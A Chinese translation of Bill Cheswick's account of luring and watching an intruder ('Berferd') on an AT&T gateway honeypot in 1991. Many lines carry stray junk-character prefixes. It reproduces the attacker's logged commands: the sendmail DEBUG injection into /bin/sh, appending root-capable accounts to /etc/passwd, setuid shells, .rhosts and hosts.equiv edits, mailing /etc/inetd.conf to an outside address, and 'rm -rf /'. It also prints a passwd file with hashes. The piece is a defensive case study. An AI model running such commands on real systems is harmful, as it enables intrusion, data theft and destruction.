引誘、欺騙并研究一個黑客——陪伴berferd的一個夜晚

在1991年1月7號，一個黑客，他確信自己發(fā)現(xiàn)了我們的Internet網關計算機的sendmail的一個DUBUG漏洞的黑客，試圖獲得我們的password文件，我“送”給他了一份。
在幾個月中，我們引誘這名黑客作各種快樂的嘗試，以便于我們發(fā)現(xiàn)他的位置和使用的破解技術。這篇文章是對該黑客的“成功”和失敗，我們使用的誘餌和陷阱的詳細記錄
我們的結論是我們所遇到的這個黑客擁有大量的時間，固執(zhí)異常，并持有一份優(yōu)秀的系統(tǒng)漏洞列表。一旦他獲得了系統(tǒng)的一個正式注冊身份，使用那些漏洞他可以輕易的攻破uucp和bin帳號，然后是root。我們的黑客對軍事目標和可以幫助他中轉其連接的新機器很感興趣。
- y" Z+ _( ~8 T  v簡介
- c* a! y9 Y$ z- G我們的安全Internet網關是1990年1月開始使用的。對于這個整個城堡的大門，我想知道它所可能遭到的攻擊會有多么頻繁。我明白Internet上有一些喜歡使用“暴力”的人，那么他們是誰？他們會攻擊什么地方？會多么頻繁？他們經常嘗試系統(tǒng)的那些漏洞？
事實上，他們沒有對AT&T作出破壞，甚至很少光顧我們的這扇大門，那么，最終的樂趣只有如此，引誘一個黑客到一個我們設計好的環(huán)境中，記錄下來他的所有動作，研究其行為，并提醒他的下一個目標作出防范。
; }% o+ }8 L  b+ H; f: A5 n: J大多數(shù)Internet上的工作站很少提供工具來作這些事情，商業(yè)系統(tǒng)檢測并報告一些問題，但是它們忽略了很多我們想要的東西。我們的網關每天產生10兆的日志文件。但人們對于日志記錄以外的服務的攻擊呢？
1 ]* n6 d! i: H3 c* Y我們添加了一些虛假的服務在系統(tǒng)上，同時我編寫了一個script文件用來檢索每天的日志。我們檢查以下幾點：
3 w" N0 x. C. W( a7 E5 H" \; MFTP ：檢索的工具會報告每天所有注冊和試圖注冊的用戶名。它還會報告用戶對tilde的使用（這是個老版本的ftp的漏洞）、所有對ftp目錄的/etc/passwd和/etc/group的存取以及對pub目錄下完整文件列表的獲取。獲取passwd的人通常用它來獲得系統(tǒng)的正式用戶的注冊名稱，然后攻擊、破解其密碼。有時有些系統(tǒng)的管理員會將系統(tǒng)的真實passwd文件放在ftp的/etc目錄下，我們偽造了一個passwd文件，它的密碼被破解后是“why are you wasting your time.”
Telnet / login ：所有試圖login的動作都被記錄了下來。這很容易就可以看出有些人在嘗試很多帳號，或強力攻擊某一個帳號。因為我們這個Internet的大門除了“警衛(wèi)”外沒有什么別的用戶，很容易就可以找到問題所在。
( y: e) _9 p# A0 L; C5 {$ uGuest / visitor 帳號：黑客們第一個尋找的就是公用帳號。這些帳號提供了友好的，最輕易的獲取幾乎系統(tǒng)的所有文件的機會，包括passwd文件。黑客也可以通過獲取/etc/hosts.equiv文件或每個用戶的.rhosts文件來獲得機器的信任主機列表。我們對于這些帳號的login script文件是這樣編寫的：
exec 2>/dev/null # ensure that stderr doesn't appear
trap "" 1
' p& L# G1 }3 P8 c; A% H$ _/bin/echo
( /bin/echo "Attempt to login to inet with $LOGNAME from $CALLER" |
8 R. F6 I) ~* y: k' b& Cupasname=adm /bin/mail ches dangelo &
# (notify calling machine's administrator for some machines...)
+ w9 N  P8 j( a. ^4 |, F# (finger the calling machine...)
( y  J# e$ T  B6 w) 2>&1 | mail ches dangelo
* [/ p. a7 v* G& Z" x/bin/echo "/tmp full"
sleep 5 # I love to make them wait....
  ~- Y' P9 g: e  r4 e/bin/echo "/tmp full"
3 v1 z3 s0 G/ Y9 c; W0 m/bin/echo "/tmp full"
/bin/echo
sleep 60 # ... and simulating a busy machine is useful
我們必須小心以便不讓調用者看到系統(tǒng)的標志出錯信息（如果一旦我們編寫的script有誤）。注意$CALLER是在另一端的主機或IP地址。通過修改telnetd或login，它將可以通過環(huán)境變量來獲取。
5 F, k. u# S# F) I+ v0 `SMTP DEBUG : 這個命令提供了兩個守候sendmail的漏洞的陷阱。雖然幾乎所有的產品出售商都清除了這個漏洞，但偶爾仍有黑客嘗試它。這個漏洞允許外部的使用者使用一段以root權限執(zhí)行的script。當有些人嘗試這個漏洞時，我就獲得了他嘗試的script代碼。
Finger ：Finger提供了大量有用的信息給黑客：帳號名，該帳號的最后一次使用時間，以及一些可以用來猜測密碼的信息。由于我們的組織不允許提供這些信息給別人，我們置入了一個程序，在finger了fingerd的調用者后拒絕figner請求。（當然我們會避免對來自自己的finger信息的死循環(huán)）。報告表明每天有數(shù)以十計的finger請求，其中大部分是合法的。
1 H  ?- _0 \8 O6 L% w: |Rlogin / rsh ：這些命令都是基于一些無條件信任的系統(tǒng)，我們的機器并不支持。但我們會finger使用這些命令的用戶，并將他的嘗試和用戶信息等生成報告。
上述很多探測器都使用figner命令來查明調用的機器和使用者。
: g$ w+ m% M* z% }. z" c1 J當一個嘗試顯示為有不合法企圖時，我就發(fā)出這樣一條消息：
) K7 J5 t' |3 P% M% U" Ninetfans postmaster@sdsu.edu
Yesterday someone from math.sdsu.edu fetched the /etc/passwd file
from our FTP directory. The file is not important, but these probes
are sometimes performed from stolen accounts.
' i+ R9 e2 U- B& R- u- l2 [  c  nJust thought you'd like to know.
Bill Cheswick
這是一個典型的信件，它被發(fā)往“inetfans”，這些人屬于計算機緊急響應小組(Computer Emergency Response Team , CERT)、某些興趣小組或對某些站點感興趣的人。
8 D0 Z' ^$ Q- G/ m- V! \很多系統(tǒng)管理員很重視這些報告，尤其是軍事站點。通常，系統(tǒng)管理員在解決這些問題上都非常合作。對這些信件的反應包括道歉，拒絕信件，關閉帳號以及沉默等等。當一個站點開來愿意支持黑客們的活動時，我們會考慮拒收來自該站的所有信息包。
- X4 E% F, x4 G7 E+ l不友好的行動
我們從1990年1月設置好這些探測器。統(tǒng)計表明被攻擊率在每年學校的假期期間會上升。我們的被攻擊率可能比其他站點高，因為我們是廣為人知的，并被認為是“電話公司”。
! D# s& C3 Q& D0 N2 H' z當一個遠程使用者取走passwd文件時，并不是所有的人都出于惡意的目的。有時他們只是想看看是否傳輸能正常工作。
19:43:10 smtpd[27466]: <--- 220 inet.att.com SMTP
1 b. p( o: o7 F. g1 ?19:43:14 smtpd[27466]: -------> debug
" Y8 @- I! y( U5 h2 h19:43:14 smtpd[27466]: DEBUG attempt
2 |, V4 H6 U* e9 P, ~$ u19:43:14 smtpd[27466]: <--- 200 OK
19:43:25 smtpd[27466]: -------> mail from:
) }+ o+ b% u9 Q- H19:43:25 smtpd[27466]: <--- 503 Expecting HELO
19:43:34 smtpd[27466]: -------> helo
/ N( }0 V, y5 M& X9 R+ P% I4 Z19:43:34 smtpd[27466]: HELO from
7 A; m% T" i2 w0 d( W: a- h1 K19:43:34 smtpd[27466]: <--- 250 inet.att.com
) }9 S8 T& [* l0 o, j19:43:42 smtpd[27466]: -------> mail from:
19:43:42 smtpd[27466]: <--- 250 OK
19:43:59 smtpd[27466]: -------> rcpt to: 19:43:59 smtpd[27466]: <--- 501 Syntax error in recipient name
19:44:44 smtpd[27466]: -------> rcpt to:<|sed -e '1,/?$/'d | /bin/sh ; exit 0">
19:44:44 smtpd[27466]: shell characters: |sed -e '1,/?$/'d | /bin/sh ; exit 0"
; ~2 O7 d2 f+ ?# G+ \19:44:45 smtpd[27466]: <--- 250 OK
19:44:48 smtpd[27466]: -------> data
4 j5 s& a1 j& a! x. u2 z19:44:48 smtpd[27466]: <--- 354 Start mail input; end with .
$ T6 N- Y# F5 O* U) k19:45:04 smtpd[27466]: <--- 250 OK
3 b, J- M2 ?6 U7 j/ u$ x19:45:04 smtpd[27466]: /dev/null sent 48 bytes to upas.security
19:45:08 smtpd[27466]: -------> quit
  _5 m, t6 {( }+ g. g& l) d1 M! V9 H19:45:08 smtpd[27466]: <--- 221 inet.att.com Terminating
8 ^2 Y* I/ R8 L0 L0 c* I! Y8 E19:45:08 smtpd[27466]: finished.
這是我們對SMTP過程的日志。這些看來很神秘的日志通常是有兩個郵件發(fā)送器來相互對話的。在這個例子中，另一端是由人來鍵入命令。他嘗試的第一個命令是DEBUG。當他接收的“250 OK”的回應時一定很驚奇。關鍵的行是“rcpt to :”。在尖括號括起的部分通常是一個郵件接收器的地址。這里它包含了一個命令行。Sendmail在DEBUG模式下用它來以ROOT身份執(zhí)行一段命令。即：
sed -e '1,/?$/'d | /bin/sh ; exit 0"
5 N0 E- \: G3 U: N0 g: h它剝去了郵件頭，并使用ROOT身份執(zhí)行了消息體。這段消息郵寄給了我，這是我記錄下來的，包含時間戳：
! g/ d) F3 S7 h6 N& [19:45 mail adrian@embezzle.stanford.edu 19:51 mail adrian@embezzle.stanford.edu 他希望我們郵寄給他一份我們的passwd文件。大概用來運行一些passwd破解程序。所有這些探測結果都來自EMBEZZLE.STANFORD.EDU的一個adrian用戶。他在美國空襲伊拉克半個小時后公然作出敵意反應。我懷疑是薩達姆雇傭了一兩個黑客。我恰巧在ftp的目錄下有一個假的passwd文件，就用root身份給Stanford發(fā)了過去。
/ z( \- [) ^- l# h8 V5 m% E* O6 r# `  W第二個早晨，我聽到了來自Stanford的消息：他們知道了這件事，并正在發(fā)現(xiàn)問題所在。他們說adrian這個帳號被盜用了。
" ^" K' z1 U1 N5 _4 x接著的一個星期天我接到了從法國發(fā)來的一封信：
To: root@research.att.com
: R. G/ I$ Y: @  X! F; kSubject: intruder
Date: Sun, 20 Jan 91 15:02:53 +0100
" Y3 ]3 n- P5 G8 B) l( e: Y: hI have just closed an account on my machine
which has been broken by an intruder coming from embezzle.stanford.edu. He
(she) has left a file called passwd. The contents are:
------------>
From root@research.att.com Tue Jan 15 18:49:13 1991
Received: from research.att.com by embezzle.Stanford.EDU (5.61/4.7);
Tue, 15 Jan 91 18:49:12 -0800
Message-Id: <9101160249.AA26092@embezzle.Stanford.EDU>
8 N' }1 C% d  ~/ [From: root@research.att.com
: M% G" W3 M' Y- K9 q& j6 {/ iDate: Tue, 15 Jan 91 21:48 EST
To: adrian@embezzle.stanford.edu
Root: mgajqD9nOAVDw:0:2:0000-Admin(0000):/:
; d, d2 N% V4 mDaemon: *:1:1:0000-Admin(0000):/:
' {( ]8 s0 Q+ {" @Bin: *:2:2:0000-Admin(0000):/bin:
& \! a7 B) o2 @: W. h# ~: VSys: *:3:3:0000-Admin(0000):/usr/v9/src:
- m. n0 ?# V2 J! A  l4 JAdm: *:4:4:0000-Admin(0000):/usr/adm:
Uucp: *:5:5:0000-uucp(0000):/usr/lib/uucp:
/ {9 R( w$ c/ w, BNuucp: *:10:10:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
% L: U/ c( ]& a  E" U% f) P. n3 T# aFtp: anonymous:71:14:file transfer:/:no soap
4 m6 P; a+ q/ l1 u' hChes: j2PPWsiVal..Q:200:1:me:/u/ches:/bin/sh
Dmr: a98tVGlT7GiaM:202:1:Dennis:/u/dmr:/bin/sh
Rtm: 5bHD/k5k2mTTs:203:1:Rob:/u/rtm:/bin/sh
6 I. F  s# J) o3 T4 s5 Z% cBerferd: deJCw4bQcNT3Y:204:1:Fred:/u/berferd:/bin/sh
Td: PXJ.d9CgZ9DmA:206:1:Tom:/u/td:/bin/sh
( Y& O  f: Q' Q+ nStatus: R
------------Please let me know if you heard of him.
陪伴Berferd的一個夜晚
1月20號，星期天晚上，我的終端報告有安全敏感事件。
22:33 finger attempt on berferd
; F2 ^8 X: V0 w1 L7 C% Q! q% ^$ ?幾分鐘后，有人試圖使用DEBUG來用ROOT身份執(zhí)行命令，他試圖修改我們的passwd文件！
% Z& q/ }' i3 {/ ]22:36 echo "beferdd::300:1:maybe Beferd:/:/bin/sh" >>/etc/passwd
cp /bin/sh /tmp/shell
chmod 4755 /tmp/shell
連接同樣來自EMBEZZLE.STANFORD.EDU。
* x2 l' J( B8 k1 r. p  x+ D. M我該怎么作呢？我不希望他真的能獲得一個網關的帳號，為什么引狼入室呢？那樣我將得不到他的鍵盤活動。
3 r. r4 `. B; w* ]6 o$ ?3 `# c) d- Y0 C我應該繼續(xù)看看他關注的其他事情，或許我可以手工模擬一下操作系統(tǒng)，這意味著我必須讓他以為機器速度很慢，因為我無法和MIPS M/120相比。同時意味著我必須模擬一個一致的操作系統(tǒng)。
我已經有一個要求了，因為他已經持有了一份passwd。
0 Y  W7 U9 O! W+ T6 g決定一：ftp的passwd是一個真實的passwd。
  ?0 @+ K( P# k! G還有另外的兩個：
決定二：網關機器管理極差。（有DEBUG漏洞，ftp目錄里有passwd）。
決定三：網關機器極慢。
3 y; f% X; Z9 v  n: y3 X因此我決定讓他以為他已經改變了passwd文件，但卻不急于讓他進來。我必須生成一個帳號，但卻使它不可操作。我應該怎么辦？
決定四：我的shell并沒有放在/bin下，它放在其他地方。這樣，他進來后（讓他認為passwd已經改動了），沒有可運行的shell。
這個決定很愚蠢，但我不會因此損失任何東西。我寫了一個script，生成了一個臨時帳號b，當它被調用時它會給我發(fā)信，調用者將看到如下信息：
RISC/os (inet)
login: b
, _. V* @# E$ Z" [1 KRISC/os (UMIPS) 4.0 inet
0 O& ?) y, b) r- @) s0 VCopyright 1986, MIPS Computer Systems
All Rights Reserved
1 F9 o* {3 G; z' E- c2 r. G; F: yShell not found
; k3 |/ m: j9 U' R  C我把b帳號在實際passwd文件中改成了beferd，當我作完后，他在此嘗試：
22:41 echo "bferd ::301:1::/:/bin/sh" >> /etc/passwd
  W9 E7 C% M. m, C5 C, i' m% H  E1 _  D他的另一個試圖添加到passwd文件的嘗試。事實上，在我為bferd完成新的配置之前他開始急躁了：
22:45 talk adrian@embezzle.stand?Hford.edu
" h2 P8 T4 N8 n  @2 N! d% }talk adrian@embezzle.stanford.edu
決定五：我們沒有talk這個命令。
他選擇了berferd這個帳號：
22:48 Attempt to login to inet with bferd from Tip-QuadA.Stanford.EDU
. n$ J# z& {8 Y22:48 Attempt to login to inet with bferd from Tip-QuadA.Stanford.EDU
4 u& Z1 p8 G. A( c$ H* M) ]  @+ A5 ]9 ^22:49 Attempt to login to inet with bferd from embezzle.Stanford.EDU
# v8 U3 e% j! C2 j6 I22:51 (Notified Stanford of the use of Tip-QuadA.Stanford.EDU)
1 H. `- K" e$ O( c( |22:51 Attempt to login to inet with bferd from embezzle.Stanford.EDU
22:51 Attempt to login to inet with bferd from embezzle.Stanford.EDU
22:55 echo "bfrd ::303:1::/tmp:/bin/sh" >> /etc/passwd
8 i4 N# L* {+ |: ^* X& o6 K* c$ d22:57 (Added bfrd to the real password file.)
( d8 P. ]: p8 w) u3 o9 V22:58 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
22:58 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
) S6 E$ w1 S) c- |6 {" v2 p( D5 y23:05 echo "36.92.0.205" >/dev/null
0 T6 n' s8 M; J5 I* T3 Secho "36.92.0.205 embezzle.stanford.edu">>/etc./?H?H?H
) e+ ~: _* `) n: p23:06 Attempt to login to inet with guest from rice-chex.ai.mit.edu
23:06 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts
* ?* {; K# X! ^- w/ O23:08 echo "embezzle.stanford.edu adrian">>/tmp/.rhosts
3 z; l6 x1 {& B6 L5 \  f+ h( M$ B( b很顯然他希望能夠rlogin到我們的網關，這需要一些本地文件的特定設置。我們并沒有作rlogin的檢測。
這時他又有新的動作：
23:09 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
  Z+ ~% ^7 i6 R( Q; Y" ~6 |23:10 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
) g, W0 p% Z6 p5 g4 [; P1 b( }' S. S23:14 mail adrian@embezzle.stanford.edu < /etc/inetd.conf
' V/ U3 G9 a; [9 \; H" Ups -aux|mail adrian@embezzle.stanford.edu
在rlogin失敗后，他希望能得到我們的inetd.conf文件來查看我們究竟啟動了什么服務。我不想讓他看到真正的inetd.conf，但偽造一個又非常困難。
決定七：網關機器運行不穩(wěn)定，時有不確定事件。
/ B' y3 G2 r% L' P0 H7 A8 }23:28 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts
echo "embezzle.stanford.edu adrian" >> /tmp/.rhosts
, E9 ?  U' M& mps -aux|mail adrian@embezzle.stanford.edu
" Y4 p. N$ X; Y& ymail adrian@embezzle.stanford.edu < /etc/inetd.conf
: U+ ]  b  M/ S" J: b我不希望他看到ps的結果，幸運的是，他的Berkeley系統(tǒng)的ps命令在我的System V機器上是無效的。
這時我通知了CERT，這時一起嚴重的攻擊事件，在Stanford也應該有追蹤這些請求的人。這時，活動又轉到ftp上來：
Jan 20 23:36:48 inet ftpd[14437]: <--- 220 inet FTP server
(Version 4.265 Fri Feb 2 13:39:38 EST 1990) ready.
8 j. s" W) \2 Z) `' lJan 20 23:36:55 inet ftpd[14437]: -------> user bfrd?M
9 j8 ^9 ~0 C) o* J& T" Q" FJan 20 23:36:55 inet ftpd[14437]: <--- 331 Password required for bfrd.
Jan 20 23:37:06 inet ftpd[14437]: -------> pass?M
* S8 M7 }' e' c! \0 ^3 n* uJan 20 23:37:06 inet ftpd[14437]: <--- 500 'PASS': command not understood.
Jan 20 23:37:13 inet ftpd[14437]: -------> pass?M
7 V* U5 k+ m& ?" F* g$ J. o4 eJan 20 23:37:13 inet ftpd[14437]: <--- 500 'PASS': command not understood.
5 K! q# T& M/ P% n$ j+ o- ~+ JJan 20 23:37:24 inet ftpd[14437]: -------> HELP?M
Jan 20 23:37:24 inet ftpd[14437]: <--- 214- The following commands are
recognized (* =>'s unimplemented).
- a+ G* |# N0 `7 g  B) UJan 20 23:37:24 inet ftpd[14437]: <--- 214 Direct comments to ftp-bugs@inet.
Jan 20 23:37:31 inet ftpd[14437]: -------> QUIT?M
Jan 20 23:37:31 inet ftpd[14437]: <--- 221 Goodbye.
  a$ Z  T; Z' G7 DJan 20 23:37:31 inet ftpd[14437]: Logout, status 0
Jan 20 23:37:31 inet inetd[116]: exit 14437
Jan 20 23:37:41 inet inetd[116]: finger request from 36.92.0.205 pid 14454
. D. }) Q/ ^+ h% X! X0 }Jan 20 23:37:41 inet inetd[116]: exit 14454
9 X* L3 ?9 f) o) r# \# V0 W5 a' h23:38 finger attempt on berferd
23:48 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts.equiv
23:53 mv /usr/etc/fingerd /usr/etc/fingerd.b
cp /bin/sh /usr/etc/fingerd
2 K7 I1 B. [) I* Z決定四已經決定了最后一行的嘗試必然失敗。因此，他只是破壞了我們模擬的機器上的finger而已，并沒有將之替換成一個shell程序。我關閉了實際的fingerd程序。
5 s* \  g: u. N( }$ w1 f23:57 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
23:58 cp /bin/csh /usr/etc/fingerd
$ S# W/ i" f9 Y2 [2 C0 M, }) Y我們模擬的機器上csh并不在/bin下，因此這個命令無效。
00:07 cp /usr/etc/fingerd.b /usr/etc/fingerd
8 E  [0 V4 ]  E. R1 R3 h好吧，fingerd現(xiàn)在重新開始工作。Berferd的恢復工作干的不錯。
00:14 passwd bfrt
bfrt
/ M4 i% a- m8 Y' X* v1 }+ B/ Ibfrt
  E9 K" r( N3 A( [現(xiàn)在他試圖修改password，這永遠不會成功，因為passwd的輸入是/dev/tty，不是sendmail所執(zhí)行的shell script。
$ I  j6 W8 a: z& d0 Y00:16 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
00:17 echo "/bin/sh" > /tmp/Shell
0 u( P0 ^8 ^$ s; kchmod 755 /tmp/shell
: O  {: e2 K1 y3 v" ]7 t4 qchmod 755 /tmp/Shell
1 N0 Y3 v( y- {: D00:19 chmod 4755 /tmp/shell
; D. z5 ~8 w# X# M4 S00:19 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
& g5 @1 d6 Z' m. F00:19 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
% E% d" R1 y6 ?, p) c00:21 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
00:21 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
2 h" V, O4 P( L; ?" k這時我已經很累了。
01:55 rm -rf /&
0 a2 z  q" E! z& x, Z! r喔??！太狠了！顯然機器的狀態(tài)讓他迷惑，他希望能清除所有的痕跡。有些黑客會保護自己所作的工作，聲明自己不作任何破壞。我們的黑客對我們感到疲勞了，因此以此結束。
他繼續(xù)工作了幾分鐘，后來放棄：
07:12 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
, N. x8 d" v( D1 j0 t4 u07:14 rm -rf /&
9 u# ?9 p: r3 h, {07:17 finger attempt on berferd
5 F1 S& L, m$ T' Q; v9 L  T07:19 /bin/rm -rf /&
7 d4 O  t- s8 t7 E) t  g" ]4 v/bin/rm -rf /&
07:23 /bin/rm -rf /&
2 O; j2 @/ O3 P9 f! h3 k- ?07:25 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
5 S8 H% A9 V. M8 f. y9 m09:41 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
" T! n/ ~& k2 E/ _) i2 e5 p